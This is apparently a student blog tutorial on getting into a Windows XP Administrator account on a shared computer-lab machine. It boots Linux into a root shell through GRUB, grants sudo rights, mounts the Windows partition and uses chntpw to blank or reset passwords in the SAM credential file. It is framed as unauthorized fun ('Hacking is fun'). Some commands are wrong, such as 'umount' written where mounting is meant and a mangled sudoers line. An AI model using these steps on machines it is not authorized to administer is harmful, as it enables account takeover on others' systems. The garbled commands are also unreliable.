Crack Windows-XP Administrator account Password

Computer Lab sessions seems to be the most boring sessions, if it is not utilized properly. I hacked into Windows XP Administrator account using Ubuntu 10.10. Before getting into windows it is important to become a root user in Ubuntu/Linux. Grub (a list shown during system startup to choose the Operating systems installed in the system) can be used to get root shell. Move the cursor to the Linux Distro’s (say Ubuntu 11.10 Natty) option and press ‘e’ (option to edit the grub). At the end of the third line in the new list there will be ro quit splash replace that word by rw init=/bin/bash. This will redirect you to a bash shell of root user. Then press ctrl + x to boot. Prompt with ‘root’ as prefix will appear. This means full access to the system! Now, edit /etc/sudoers
In order to edit /etc/sudoers you have to use visudo editor

Find this line: root ALL=(ALL) (ALL) and just under this line add a line, in which desired User name should be given.
your-username ALL=(ALL) ALLNow reboot system using this command┬áLogin in to the system using the given user name and password and you are now the root user of the system. Open a terminal (applications->terminal or use default shortcut: ctrl+alt+t) and install chntpw – utility to overwrite Windows NT/2000 SAM passwords.Find out the partition in which you have install the windows using any of these commands:

$ sudo fdisk -l
$ sudo parted /dev/sda print

Now, mount the Windows File system(C drive in most of the case) Using this command:

$ sudo umount /dev/sda# /mnt/

#-the respective number of the Windows partition that you found using the command fdisk and parted
/mnt- the directory where you are going to mount. You can give it anywhere you want. I prefer this directory.

Change the directory to Windows partition under the directory mnt, using cd command. Then using your basic Linux skills try to get into the directory Windows/System32/config using cd command.
You are now almost done. Use this command to modify the file SAM – Security Account Manager (is a database present on servers running Windows Server 2003 that stores user accounts and security descriptors for users on the local computer):

$ sudo chntpw SAM

When you use this command you will get this.

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0
| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrator | ADMIN | dis/lock |
| 03e8 | corelabs | ADMIN | |
| 01f5 | Guest | | *BLANK* |
| 03ee | HomeGroupUser$ | | |
| 03e9 | VUSR_CORELABS-PC | | |
---------------------> SYSKEY CHECK Not Set (not installed, good!)
SAM Account\F : 0 -> off
SECURITY PolSecretEncryptionKey: -1 -> Not Set (OK if this is NT4)
Syskey not installed!

RID : 0500 [01f4]
Username: Administrator
comment : Built-in account for administering the computer/domain
homedir :

User is member of 1 groups:
00000220 = Administrators (which has 2 members)

Account bits: 0x0211 =
[X] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 1

- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
4 - Unlock and enable user account [probably locked now]
q - Quit editing user, back to user select
Select: [q]>

Based on your necessity, you can use any of these options [1, 2, 3, 4, q]
Don’t forget to save the file-SAM after changes or else there wont be any results. When you boot to Windows next time you will be able to access Administrative account if you have used options-[1 & 2].

Hacking is fun, so Have fun!!